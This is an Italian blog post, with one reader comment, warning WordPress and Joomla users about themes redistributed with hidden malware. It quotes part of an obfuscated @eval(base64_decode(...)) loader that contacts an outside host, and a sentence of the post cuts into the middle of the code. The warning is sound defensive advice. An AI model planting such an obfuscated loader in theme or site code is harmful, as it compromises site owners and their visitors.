Temi per Wordpress con malware, attenzione!

.
Un consiglio agli utilizzatori nuovi ed esistenti di Wordpress e Joomla: Quando scaricate un nuovo tema per il vostro sito prestate attenzione, poichè si sta diffondendo la stupida moda di inserire del codice malevolo all’interno delle pagine che lo compongono, così da potervi per esempio rubare la password del vostro sito, o peggio infettare il computer dei vostri visitatori con qualche virus sfruttando i bug dei vari browser.
.
Identificare la fonte originale del tema e scaricare direttamente dal sito web degli autori è un buon modo per evitare questo tipo di problemi.
Un esempio è la gallery WP Sphere, che ridistribuisce i temi con all’interno un codice criptato in base_64 che non si capisce che cosa tenti di fare. il blocco di codice malevolo si presenta in modo simile a quanto segue:
@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\Se avete scaricato il tema per il vostro wordpress da un sito di raccolta temi diverso dalla sezione Themes di wordpress o dal sito dell’autore vi consiglio di controllare che all’interno delle pagine non ci siano sorprese di questo tipo…
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpIC

La Gazzetta


Cavolo non ci avevo mai pensato a una cosa del genere!! Andrò a controllare che non ci sia niente di simile nel mio tema di wordpress, l’ho scaricato da un sito simile a quello di cui parli.
Grazie!!